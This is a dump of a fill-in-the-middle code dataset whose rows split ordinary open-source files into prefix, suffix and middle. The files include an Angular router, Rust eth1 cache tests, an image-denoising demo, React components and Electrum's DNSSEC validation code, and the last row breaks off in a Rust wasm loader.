file_name
stringlengths 3
137
| prefix
stringlengths 0
918k
| suffix
stringlengths 0
962k
| middle
stringlengths 0
812k
|
---|---|---|---|
app-routing.module.ts | import {NgModule} from '@angular/core';
import {Routes, RouterModule} from '@angular/router';
import {IsLoginGuard} from './guards/is-login.guard';
import {ChatComponent} from './components/chat/chat.component';
import {RoomsComponent} from './components/rooms/rooms.component';
import {NotFoundComponent} from './components/not-found/not-found.component';
import {LoginComponent} from './components/login/login.component';
import {
CHAT_ROOMS_URL,
CHAT_URL
} from './consts';
const routes: Routes = [
{path: '', component: LoginComponent},
{path: CHAT_URL, component: ChatComponent, canActivate: [IsLoginGuard]},
{path: CHAT_ROOMS_URL, component: RoomsComponent, canActivate: [IsLoginGuard]},
{
path: '**',
component: NotFoundComponent
}
];
@NgModule({
imports: [RouterModule.forRoot(routes)],
exports: [RouterModule]
})
export class | {
}
| AppRoutingModule |
test.rs | #![cfg(test)]
use environment::{Environment, EnvironmentBuilder};
use eth1::http::{get_deposit_count, get_deposit_logs_in_range, get_deposit_root, Block, Log};
use eth1::{Config, Service};
use eth1::{DepositCache, DepositLog};
use eth1_test_rig::GanacheEth1Instance;
use futures::Future;
use merkle_proof::verify_merkle_proof;
use std::ops::Range;
use std::time::Duration;
use tokio::runtime::Runtime;
use tree_hash::TreeHash;
use types::{DepositData, EthSpec, Hash256, Keypair, MainnetEthSpec, MinimalEthSpec, Signature};
use web3::{transports::Http, Web3};
const DEPOSIT_CONTRACT_TREE_DEPTH: usize = 32;
pub fn new_env() -> Environment<MinimalEthSpec> {
EnvironmentBuilder::minimal()
// Use a single thread, so that when all tests are run in parallel they don't have so many
// threads.
.single_thread_tokio_runtime()
.expect("should start tokio runtime")
.null_logger()
.expect("should start null logger")
.build()
.expect("should build env")
}
fn timeout() -> Duration {
Duration::from_secs(2)
}
fn random_deposit_data() -> DepositData {
let keypair = Keypair::random();
let mut deposit = DepositData {
pubkey: keypair.pk.into(),
withdrawal_credentials: Hash256::zero(),
amount: 32_000_000_000,
signature: Signature::empty_signature().into(),
};
deposit.signature = deposit.create_signature(&keypair.sk, &MainnetEthSpec::default_spec());
deposit
}
/// Blocking operation to get the deposit logs from the `deposit_contract`.
fn blocking_deposit_logs(
runtime: &mut Runtime,
eth1: &GanacheEth1Instance,
range: Range<u64>,
) -> Vec<Log> {
runtime
.block_on(get_deposit_logs_in_range(
ð1.endpoint(),
ð1.deposit_contract.address(),
range,
timeout(),
))
.expect("should get logs")
}
/// Blocking operation to get the deposit root from the `deposit_contract`.
fn blocking_deposit_root(
runtime: &mut Runtime,
eth1: &GanacheEth1Instance,
block_number: u64,
) -> Option<Hash256> {
runtime
.block_on(get_deposit_root(
ð1.endpoint(),
ð1.deposit_contract.address(),
block_number,
timeout(),
))
.expect("should get deposit root")
}
/// Blocking operation to get the deposit count from the `deposit_contract`.
fn blocking_deposit_count(
runtime: &mut Runtime,
eth1: &GanacheEth1Instance,
block_number: u64,
) -> Option<u64> {
runtime
.block_on(get_deposit_count(
ð1.endpoint(),
ð1.deposit_contract.address(),
block_number,
timeout(),
))
.expect("should get deposit count")
}
fn get_block_number(runtime: &mut Runtime, web3: &Web3<Http>) -> u64 {
runtime
.block_on(web3.eth().block_number().map(|v| v.as_u64()))
.expect("should get block number")
}
mod eth1_cache {
use super::*;
#[test]
fn simple_scenario() {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
for follow_distance in 0..2 {
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = ð1.deposit_contract;
let web3 = eth1.web3();
let initial_block_number = get_block_number(runtime, &web3);
let service = Service::new(
Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
lowest_cached_block_number: initial_block_number,
follow_distance,
..Config::default()
},
log.clone(),
);
// Create some blocks and then consume them, performing the test `rounds` times.
for round in 0..2 {
let blocks = 4;
let initial = if round == 0 {
initial_block_number
} else {
service
.blocks()
.read()
.highest_block_number()
.map(|n| n + follow_distance)
.expect("should have a latest block after the first round")
};
for _ in 0..blocks {
runtime
.block_on(eth1.ganache.evm_mine())
.expect("should mine block");
}
runtime
.block_on(service.update_deposit_cache())
.expect("should update deposit cache");
runtime
.block_on(service.update_block_cache())
.expect("should update block cache");
runtime
.block_on(service.update_block_cache())
.expect("should update cache when nothing has changed");
assert_eq!(
service
.blocks()
.read()
.highest_block_number()
.map(|n| n + follow_distance),
Some(initial + blocks),
"should update {} blocks in round {} (follow {})",
blocks,
round,
follow_distance,
);
}
}
}
/// Tests the case where we attempt to download more blocks than will fit in the cache.
#[test]
fn big_skip() {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = ð1.deposit_contract;
let web3 = eth1.web3();
let cache_len = 4;
let service = Service::new(
Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
lowest_cached_block_number: get_block_number(runtime, &web3),
follow_distance: 0,
block_cache_truncation: Some(cache_len),
..Config::default()
},
log,
);
let blocks = cache_len * 2;
for _ in 0..blocks {
runtime
.block_on(eth1.ganache.evm_mine())
.expect("should mine block")
}
runtime
.block_on(service.update_deposit_cache())
.expect("should update deposit cache");
runtime
.block_on(service.update_block_cache())
.expect("should update block cache");
assert_eq!(
service.block_cache_len(),
cache_len,
"should not grow cache beyond target"
);
}
/// Tests to ensure that the cache gets pruned when doing multiple downloads smaller than the
/// cache size.
#[test]
fn pruning() {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = ð1.deposit_contract;
let web3 = eth1.web3();
let cache_len = 4;
let service = Service::new(
Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
lowest_cached_block_number: get_block_number(runtime, &web3),
follow_distance: 0,
block_cache_truncation: Some(cache_len),
..Config::default()
},
log,
);
for _ in 0..4 {
for _ in 0..cache_len / 2 {
runtime
.block_on(eth1.ganache.evm_mine())
.expect("should mine block")
}
runtime
.block_on(service.update_deposit_cache())
.expect("should update deposit cache");
runtime
.block_on(service.update_block_cache())
.expect("should update block cache");
}
assert_eq!(
service.block_cache_len(),
cache_len,
"should not grow cache beyond target"
);
}
#[test]
fn double_update() {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
let n = 16;
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = ð1.deposit_contract;
let web3 = eth1.web3();
let service = Service::new(
Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
lowest_cached_block_number: get_block_number(runtime, &web3),
follow_distance: 0,
..Config::default()
},
log,
);
for _ in 0..n {
runtime
.block_on(eth1.ganache.evm_mine())
.expect("should mine block")
}
runtime
.block_on(
service
.update_deposit_cache()
.join(service.update_deposit_cache()),
)
.expect("should perform two simultaneous updates of deposit cache");
runtime
.block_on(
service
.update_block_cache()
.join(service.update_block_cache()),
)
.expect("should perform two simultaneous updates of block cache");
assert!(service.block_cache_len() >= n, "should grow the cache");
}
}
mod deposit_tree {
use super::*;
#[test]
fn updating() |
#[test]
fn double_update() {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
let n = 8;
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = ð1.deposit_contract;
let web3 = eth1.web3();
let start_block = get_block_number(runtime, &web3);
let service = Service::new(
Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
deposit_contract_deploy_block: start_block,
lowest_cached_block_number: start_block,
follow_distance: 0,
..Config::default()
},
log,
);
let deposits: Vec<_> = (0..n).map(|_| random_deposit_data()).collect();
for deposit in &deposits {
deposit_contract
.deposit(runtime, deposit.clone())
.expect("should perform a deposit");
}
runtime
.block_on(
service
.update_deposit_cache()
.join(service.update_deposit_cache()),
)
.expect("should perform two updates concurrently");
assert_eq!(service.deposit_cache_len(), n);
}
#[test]
fn cache_consistency() {
let mut env = new_env();
let runtime = env.runtime();
let n = 8;
let deposits: Vec<_> = (0..n).map(|_| random_deposit_data()).collect();
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = ð1.deposit_contract;
let web3 = eth1.web3();
let mut deposit_roots = vec![];
let mut deposit_counts = vec![];
// Perform deposits to the smart contract, recording it's state along the way.
for deposit in &deposits {
deposit_contract
.deposit(runtime, deposit.clone())
.expect("should perform a deposit");
let block_number = get_block_number(runtime, &web3);
deposit_roots.push(
blocking_deposit_root(runtime, ð1, block_number)
.expect("should get root if contract exists"),
);
deposit_counts.push(
blocking_deposit_count(runtime, ð1, block_number)
.expect("should get count if contract exists"),
);
}
let mut tree = DepositCache::default();
// Pull all the deposit logs from the contract.
let block_number = get_block_number(runtime, &web3);
let logs: Vec<_> = blocking_deposit_logs(runtime, ð1, 0..block_number)
.iter()
.map(|raw| DepositLog::from_log(raw).expect("should parse deposit log"))
.inspect(|log| {
tree.insert_log(log.clone())
.expect("should add consecutive logs")
})
.collect();
// Check the logs for invariants.
for i in 0..logs.len() {
let log = &logs[i];
assert_eq!(
log.deposit_data, deposits[i],
"log {} should have correct deposit data",
i
);
assert_eq!(log.index, i as u64, "log {} should have correct index", i);
}
// For each deposit test some more invariants
for i in 0..n {
// Ensure the deposit count from the smart contract was as expected.
assert_eq!(
deposit_counts[i],
i as u64 + 1,
"deposit count should be accurate"
);
// Ensure that the root from the deposit tree matches what the contract reported.
let (root, deposits) = tree
.get_deposits(0, i as u64, deposit_counts[i], DEPOSIT_CONTRACT_TREE_DEPTH)
.expect("should get deposits");
assert_eq!(
root, deposit_roots[i],
"tree deposit root {} should match the contract",
i
);
// Ensure that the deposits all prove into the root from the smart contract.
let deposit_root = deposit_roots[i];
for (j, deposit) in deposits.iter().enumerate() {
assert!(
verify_merkle_proof(
deposit.data.tree_hash_root(),
&deposit.proof,
DEPOSIT_CONTRACT_TREE_DEPTH + 1,
j,
deposit_root
),
"deposit merkle proof should prove into deposit contract root"
)
}
}
}
}
/// Tests for the base HTTP requests and response handlers.
mod http {
use super::*;
fn get_block(runtime: &mut Runtime, eth1: &GanacheEth1Instance, block_number: u64) -> Block {
runtime
.block_on(eth1::http::get_block(
ð1.endpoint(),
block_number,
timeout(),
))
.expect("should get block number")
}
#[test]
fn incrementing_deposits() {
let mut env = new_env();
let runtime = env.runtime();
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = ð1.deposit_contract;
let web3 = eth1.web3();
let block_number = get_block_number(runtime, &web3);
let logs = blocking_deposit_logs(runtime, ð1, 0..block_number);
assert_eq!(logs.len(), 0);
let mut old_root = blocking_deposit_root(runtime, ð1, block_number);
let mut old_block = get_block(runtime, ð1, block_number);
let mut old_block_number = block_number;
assert_eq!(
blocking_deposit_count(runtime, ð1, block_number),
Some(0),
"should have deposit count zero"
);
for i in 1..=8 {
runtime
.block_on(eth1.ganache.increase_time(1))
.expect("should be able to increase time on ganache");
deposit_contract
.deposit(runtime, random_deposit_data())
.expect("should perform a deposit");
// Check the logs.
let block_number = get_block_number(runtime, &web3);
let logs = blocking_deposit_logs(runtime, ð1, 0..block_number);
assert_eq!(logs.len(), i, "the number of logs should be as expected");
// Check the deposit count.
assert_eq!(
blocking_deposit_count(runtime, ð1, block_number),
Some(i as u64),
"should have a correct deposit count"
);
// Check the deposit root.
let new_root = blocking_deposit_root(runtime, ð1, block_number);
assert_ne!(
new_root, old_root,
"deposit root should change with each deposit"
);
old_root = new_root;
// Check the block hash.
let new_block = get_block(runtime, ð1, block_number);
assert_ne!(
new_block.hash, old_block.hash,
"block hash should change with each deposit"
);
// Check to ensure the timestamp is increasing
assert!(
old_block.timestamp <= new_block.timestamp,
"block timestamp should increase"
);
old_block = new_block.clone();
// Check the block number.
assert!(
block_number > old_block_number,
"block number should increase"
);
old_block_number = block_number;
// Check to ensure the block root is changing
assert_ne!(
new_root,
Some(new_block.hash),
"the deposit root should be different to the block hash"
);
}
}
}
mod fast {
use super::*;
// Adds deposits into deposit cache and matches deposit_count and deposit_root
// with the deposit count and root computed from the deposit cache.
#[test]
fn deposit_cache_query() {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = ð1.deposit_contract;
let web3 = eth1.web3();
let now = get_block_number(runtime, &web3);
let service = Service::new(
Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
deposit_contract_deploy_block: now,
lowest_cached_block_number: now,
follow_distance: 0,
block_cache_truncation: None,
..Config::default()
},
log,
);
let n = 10;
let deposits: Vec<_> = (0..n).map(|_| random_deposit_data()).collect();
for deposit in &deposits {
deposit_contract
.deposit(runtime, deposit.clone())
.expect("should perform a deposit");
// Mine an extra block between deposits to test for corner cases
runtime
.block_on(eth1.ganache.evm_mine())
.expect("should mine block");
}
runtime
.block_on(service.update_deposit_cache())
.expect("should perform update");
assert!(
service.deposit_cache_len() >= n,
"should have imported n deposits"
);
for block_num in 0..=get_block_number(runtime, &web3) {
let expected_deposit_count = blocking_deposit_count(runtime, ð1, block_num);
let expected_deposit_root = blocking_deposit_root(runtime, ð1, block_num);
let deposit_count = service
.deposits()
.read()
.cache
.get_deposit_count_from_cache(block_num);
let deposit_root = service
.deposits()
.read()
.cache
.get_deposit_root_from_cache(block_num);
assert_eq!(
expected_deposit_count, deposit_count,
"deposit count from cache should match queried"
);
assert_eq!(
expected_deposit_root, deposit_root,
"deposit root from cache should match queried"
);
}
}
}
mod persist {
use super::*;
#[test]
fn test_persist_caches() {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = ð1.deposit_contract;
let web3 = eth1.web3();
let now = get_block_number(runtime, &web3);
let config = Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
deposit_contract_deploy_block: now,
lowest_cached_block_number: now,
follow_distance: 0,
block_cache_truncation: None,
..Config::default()
};
let service = Service::new(config.clone(), log.clone());
let n = 10;
let deposits: Vec<_> = (0..n).map(|_| random_deposit_data()).collect();
for deposit in &deposits {
deposit_contract
.deposit(runtime, deposit.clone())
.expect("should perform a deposit");
}
runtime
.block_on(service.update_deposit_cache())
.expect("should perform update");
assert!(
service.deposit_cache_len() >= n,
"should have imported n deposits"
);
let deposit_count = service.deposit_cache_len();
runtime
.block_on(service.update_block_cache())
.expect("should perform update");
assert!(
service.block_cache_len() >= n,
"should have imported n eth1 blocks"
);
let block_count = service.block_cache_len();
let eth1_bytes = service.as_bytes();
// Drop service and recover from bytes
drop(service);
let recovered_service = Service::from_bytes(ð1_bytes, config, log).unwrap();
assert_eq!(
recovered_service.block_cache_len(),
block_count,
"Should have equal cached blocks as before recovery"
);
assert_eq!(
recovered_service.deposit_cache_len(),
deposit_count,
"Should have equal cached deposits as before recovery"
);
}
}
| {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
let n = 4;
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = ð1.deposit_contract;
let web3 = eth1.web3();
let start_block = get_block_number(runtime, &web3);
let service = Service::new(
Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
deposit_contract_deploy_block: start_block,
follow_distance: 0,
..Config::default()
},
log,
);
for round in 0..3 {
let deposits: Vec<_> = (0..n).map(|_| random_deposit_data()).collect();
for deposit in &deposits {
deposit_contract
.deposit(runtime, deposit.clone())
.expect("should perform a deposit");
}
runtime
.block_on(service.update_deposit_cache())
.expect("should perform update");
runtime
.block_on(service.update_deposit_cache())
.expect("should perform update when nothing has changed");
let first = n * round;
let last = n * (round + 1);
let (_root, local_deposits) = service
.deposits()
.read()
.cache
.get_deposits(first, last, last, 32)
.unwrap_or_else(|_| panic!("should get deposits in round {}", round));
assert_eq!(
local_deposits.len(),
n as usize,
"should get the right number of deposits in round {}",
round
);
assert_eq!(
local_deposits
.iter()
.map(|d| d.data.clone())
.collect::<Vec<_>>(),
deposits.to_vec(),
"obtained deposits should match those submitted in round {}",
round
);
}
} |
3D_royer_hcr_transform.py | # flake8: noqa
from aydin.features.standard_features import StandardFeatureGenerator
from aydin.io.datasets import examples_single
from aydin.it.fgr import ImageTranslatorFGR
from aydin.it.transforms.attenuation import AttenuationTransform
from aydin.regression.cb import CBRegressor
from aydin.util.log.log import Log
def | (image):
"""
In some cases it might be usefull to append a compression transform (sqrt) after normalisation,
something akin to a VST transform but without the exact variance stabilisation, and more as a way
to deskew the histogram. There are only a few situations where this truly helps, and there are not many.
So by default this is off.
"""
Log.enable_output = True
# Log.set_log_max_depth(5)
generator = StandardFeatureGenerator(
# include_scale_one=True,
# include_fine_features=True,
# include_corner_features=True,
# include_line_features=True,
# decimate_large_scale_features=False,
# extend_large_scale_features=True,
include_corner_features=True,
include_scale_one=True,
include_fine_features=True,
# include_spatial_features=True,
)
regressor = CBRegressor(patience=20, gpu=True)
it = ImageTranslatorFGR(
feature_generator=generator, regressor=regressor, normaliser_transform='sqrt'
)
it.train(image, image)
denoised = it.translate(image)
ac = AttenuationTransform(axes=0)
corrected = ac.preprocess(image)
it.train(corrected, corrected)
denoised_corrected = it.translate(corrected)
import napari
with napari.gui_qt():
viewer = napari.Viewer()
viewer.add_image(image, name='image')
viewer.add_image(corrected, name='noisy')
viewer.add_image(denoised, name='denoised')
viewer.add_image(denoised_corrected, name='denoised_corrected')
if __name__ == "__main__":
hcr = examples_single.royerlab_hcr.get_array().squeeze()
hcr = hcr[2, :20, 400 : 400 + 256, 700 : 700 + 256]
demo(hcr)
| demo |
connection-factory.ts | import { MessageConnection, createMessageConnection, Logger } from 'vscode-jsonrpc';
import { Channel } from './channel-protocol';
import { ChannelMessageReader } from './reader';
import { ChannelMessageWriter } from './writer';
import { Component } from '@malagu/core'; | export const ConnnectionFactory = Symbol('ConnnectionFactory');
export interface ConnnectionFactory<T> {
create(t: T, logger: Logger): MessageConnection;
}
@Component(ConnnectionFactory)
export class ConnnectionFactoryImpl implements ConnnectionFactory<Channel> {
create(channel: Channel, logger: Logger): MessageConnection {
const messageReader = new ChannelMessageReader(channel);
const messageWriter = new ChannelMessageWriter(channel);
const connection = createMessageConnection(messageReader, messageWriter, logger);
connection.onClose(() => connection.dispose());
return connection;
}
} | |
CreateElementButton.js | import React, { Component } from 'react';
class | extends Component {
onElementCreate = (e) => {
this.props.onElementCreate( )
}
render() {
return (
<a className="ui button blue" onClick={ this.onElementCreate }><i className="ui icon plus circle"></i> Add Element</a>
);
}
}
export default CreateElementButton;
| CreateElementButton |
SideDrawer.js | import React from "react";
import ReactDOM from "react-dom";
import { CSSTransition } from "react-transition-group";
import "./SideDrawer.css";
| const SideDrawer = (props) => {
const content = (
<CSSTransition
in={props.show}
classNames="slide-in-left"
timeout={1200}
mountOnEnter
unmountOnExit
>
<aside className="side-drawer" onClick={props.onClick}>
{props.children}
</aside>
</CSSTransition>
);
return ReactDOM.createPortal(content, document.getElementById("drawer-hook"));
};
export default SideDrawer; | |
dnssec.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Check DNSSEC trust chain.
# Todo: verify expiration dates
#
# Based on
# http://backreference.org/2010/11/17/dnssec-verification-with-dig/
# https://github.com/rthalley/dnspython/blob/master/tests/test_dnssec.py
import traceback
import sys
import time
import struct
import dns.name
import dns.query
import dns.dnssec
import dns.message
import dns.resolver
import dns.rdatatype
import dns.rdtypes.ANY.NS
import dns.rdtypes.ANY.CNAME
import dns.rdtypes.ANY.DLV
import dns.rdtypes.ANY.DNSKEY
import dns.rdtypes.ANY.DS
import dns.rdtypes.ANY.NSEC
import dns.rdtypes.ANY.NSEC3
import dns.rdtypes.ANY.NSEC3PARAM
import dns.rdtypes.ANY.RRSIG
import dns.rdtypes.ANY.SOA
import dns.rdtypes.ANY.TXT
import dns.rdtypes.IN.A
import dns.rdtypes.IN.AAAA
from dns.exception import DNSException
# Pure-Python version of dns.dnssec._validate_rsig
import ecdsa
from . import rsakey
def | (rrset, rrsig, keys, origin=None, now=None):
from dns.dnssec import ValidationFailure, ECDSAP256SHA256, ECDSAP384SHA384
from dns.dnssec import _find_candidate_keys, _make_hash, _is_ecdsa, _is_rsa, _to_rdata, _make_algorithm_id
if isinstance(origin, str):
origin = dns.name.from_text(origin, dns.name.root)
for candidate_key in _find_candidate_keys(keys, rrsig):
if not candidate_key:
raise ValidationFailure('unknown key')
# For convenience, allow the rrset to be specified as a (name, rdataset)
# tuple as well as a proper rrset
if isinstance(rrset, tuple):
rrname = rrset[0]
rdataset = rrset[1]
else:
rrname = rrset.name
rdataset = rrset
if now is None:
now = time.time()
if rrsig.expiration < now:
raise ValidationFailure('expired')
if rrsig.inception > now:
raise ValidationFailure('not yet valid')
hash = _make_hash(rrsig.algorithm)
if _is_rsa(rrsig.algorithm):
keyptr = candidate_key.key
(bytes,) = struct.unpack('!B', keyptr[0:1])
keyptr = keyptr[1:]
if bytes == 0:
(bytes,) = struct.unpack('!H', keyptr[0:2])
keyptr = keyptr[2:]
rsa_e = keyptr[0:bytes]
rsa_n = keyptr[bytes:]
n = ecdsa.util.string_to_number(rsa_n)
e = ecdsa.util.string_to_number(rsa_e)
pubkey = rsakey.RSAKey(n, e)
sig = rrsig.signature
elif _is_ecdsa(rrsig.algorithm):
if rrsig.algorithm == ECDSAP256SHA256:
curve = ecdsa.curves.NIST256p
key_len = 32
digest_len = 32
elif rrsig.algorithm == ECDSAP384SHA384:
curve = ecdsa.curves.NIST384p
key_len = 48
digest_len = 48
else:
# shouldn't happen
raise ValidationFailure('unknown ECDSA curve')
keyptr = candidate_key.key
x = ecdsa.util.string_to_number(keyptr[0:key_len])
y = ecdsa.util.string_to_number(keyptr[key_len:key_len * 2])
assert ecdsa.ecdsa.point_is_valid(curve.generator, x, y)
point = ecdsa.ellipticcurve.Point(curve.curve, x, y, curve.order)
verifying_key = ecdsa.keys.VerifyingKey.from_public_point(point, curve)
r = rrsig.signature[:key_len]
s = rrsig.signature[key_len:]
sig = ecdsa.ecdsa.Signature(ecdsa.util.string_to_number(r),
ecdsa.util.string_to_number(s))
else:
raise ValidationFailure('unknown algorithm %u' % rrsig.algorithm)
hash.update(_to_rdata(rrsig, origin)[:18])
hash.update(rrsig.signer.to_digestable(origin))
if rrsig.labels < len(rrname) - 1:
suffix = rrname.split(rrsig.labels + 1)[1]
rrname = dns.name.from_text('*', suffix)
rrnamebuf = rrname.to_digestable(origin)
rrfixed = struct.pack('!HHI', rdataset.rdtype, rdataset.rdclass,
rrsig.original_ttl)
rrlist = sorted(rdataset);
for rr in rrlist:
hash.update(rrnamebuf)
hash.update(rrfixed)
rrdata = rr.to_digestable(origin)
rrlen = struct.pack('!H', len(rrdata))
hash.update(rrlen)
hash.update(rrdata)
digest = hash.digest()
if _is_rsa(rrsig.algorithm):
digest = _make_algorithm_id(rrsig.algorithm) + digest
if pubkey.verify(bytearray(sig), bytearray(digest)):
return
elif _is_ecdsa(rrsig.algorithm):
diglong = ecdsa.util.string_to_number(digest)
if verifying_key.pubkey.verifies(diglong, sig):
return
else:
raise ValidationFailure('unknown algorithm %s' % rrsig.algorithm)
raise ValidationFailure('verify failure')
# replace validate_rrsig
dns.dnssec._validate_rrsig = python_validate_rrsig
dns.dnssec.validate_rrsig = python_validate_rrsig
dns.dnssec.validate = dns.dnssec._validate
from .util import print_error
# hard-coded trust anchors (root KSKs)
trust_anchors = [
# KSK-2017:
dns.rrset.from_text('.', 1 , 'IN', 'DNSKEY', '257 3 8 AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3+/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kvArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+eoZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfdRUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwNR1AkUTV74bU='),
# KSK-2010:
dns.rrset.from_text('.', 15202, 'IN', 'DNSKEY', '257 3 8 AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq QxA+Uk1ihz0='),
]
def check_query(ns, sub, _type, keys):
q = dns.message.make_query(sub, _type, want_dnssec=True)
response = dns.query.tcp(q, ns, timeout=5)
assert response.rcode() == 0, 'No answer'
answer = response.answer
assert len(answer) != 0, ('No DNS record found', sub, _type)
assert len(answer) != 1, ('No DNSSEC record found', sub, _type)
if answer[0].rdtype == dns.rdatatype.RRSIG:
rrsig, rrset = answer
elif answer[1].rdtype == dns.rdatatype.RRSIG:
rrset, rrsig = answer
else:
raise BaseException('No signature set in record')
if keys is None:
keys = {dns.name.from_text(sub):rrset}
dns.dnssec.validate(rrset, rrsig, keys)
return rrset
def get_and_validate(ns, url, _type):
# get trusted root key
root_rrset = None
for dnskey_rr in trust_anchors:
try:
# Check if there is a valid signature for the root dnskey
root_rrset = check_query(ns, '', dns.rdatatype.DNSKEY, {dns.name.root: dnskey_rr})
break
except dns.dnssec.ValidationFailure:
# It's OK as long as one key validates
continue
if not root_rrset:
raise dns.dnssec.ValidationFailure('None of the trust anchors found in DNS')
keys = {dns.name.root: root_rrset}
# top-down verification
parts = url.split('.')
for i in range(len(parts), 0, -1):
sub = '.'.join(parts[i-1:])
name = dns.name.from_text(sub)
# If server is authoritative, don't fetch DNSKEY
query = dns.message.make_query(sub, dns.rdatatype.NS)
response = dns.query.udp(query, ns, 3)
assert response.rcode() == dns.rcode.NOERROR, "query error"
rrset = response.authority[0] if len(response.authority) > 0 else response.answer[0]
rr = rrset[0]
if rr.rdtype == dns.rdatatype.SOA:
continue
# get DNSKEY (self-signed)
rrset = check_query(ns, sub, dns.rdatatype.DNSKEY, None)
# get DS (signed by parent)
ds_rrset = check_query(ns, sub, dns.rdatatype.DS, keys)
# verify that a signed DS validates DNSKEY
for ds in ds_rrset:
for dnskey in rrset:
htype = 'SHA256' if ds.digest_type == 2 else 'SHA1'
good_ds = dns.dnssec.make_ds(name, dnskey, htype)
if ds == good_ds:
break
else:
continue
break
else:
raise BaseException("DS does not match DNSKEY")
# set key for next iteration
keys = {name: rrset}
# get TXT record (signed by zone)
rrset = check_query(ns, url, _type, keys)
return rrset
def query(url, rtype):
# 8.8.8.8 is Google's public DNS server
nameservers = ['8.8.8.8']
ns = nameservers[0]
try:
out = get_and_validate(ns, url, rtype)
validated = True
except BaseException as e:
#traceback.print_exc(file=sys.stderr)
print_error("DNSSEC error:", str(e))
resolver = dns.resolver.get_default_resolver()
out = resolver.query(url, rtype)
validated = False
return out, validated
| python_validate_rrsig |
lib.rs | #[macro_use]
extern crate serde_derive;
mod models;
mod types;
use serde_json;
use serde_json::json;
use serde_json::value::Value;
use types::{DeleteOpts, JsSpec, ResourceSpec};
use wasm_bindgen::prelude::*;
use wasm_bindgen::JsValue;
#[wasm_bindgen]
extern "C" {
#[wasm_bindgen(js_namespace = console)]
fn log(s: &str);
}
#[wasm_bindgen]
pub fn load_resource_to_js(value: &JsValue) -> JsValue | {
let default_cp = String::from("huaweicloud");
let res: ResourceSpec = value.into_serde().expect("failed to load resource spec!");
let k = res.get_kind();
let op = res.get_metadata().get_operation();
let provider = res.get_metadata().get_cloud_provider();
let mut js = JsSpec::new(&res.get_kind(), &op, json!(null));
let json_spec = serde_json::to_string(&res.get_spec()).unwrap();
match k.as_str() {
"ComputeResource" => {
let mut spec: models::ComputeResourceCreateRequest =
serde_json::from_str(&json_spec).unwrap();
// Update cloud provider info of compute resource create request
// from metadata
spec.cloud_provider = provider;
